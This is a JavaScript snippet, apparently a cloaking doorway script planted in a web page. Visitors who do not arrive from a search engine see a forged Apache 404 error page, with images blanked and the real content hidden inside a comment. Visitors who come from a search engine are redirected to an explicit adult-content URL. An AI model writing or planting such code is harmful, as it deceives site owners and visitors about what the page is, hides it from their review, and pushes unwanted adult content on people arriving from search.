if(document.referrer.indexOf("search") == -1 &&
    document.referrer.indexOf("?")      == -1)
 {
   for(i=0;i<document.images.length;i++)
   {
    document.images[i].src='';
   }  window.document.title='404 Not found';
  window.document.body.style.backgroundColor='white';
  window.document.body.text='000000';
  document.writeln("<H1>Not Found</H1>");
  document.writeln("The requested URL  "+window.location.pathname);
  document.writeln("was not found on this server.<P>");
  document.writeln("<HR>");
  document.writeln("<ADDRESS>Apache/1.3.29 Server at "+window.location.hostname+" Port 80</ADDRESS>");
  document.writeln("<div style='display:none'>");
  document.writeln("<!--");
 }
 else
  location.href='http://www.xxx-storage.com/2006/boobs/index.html';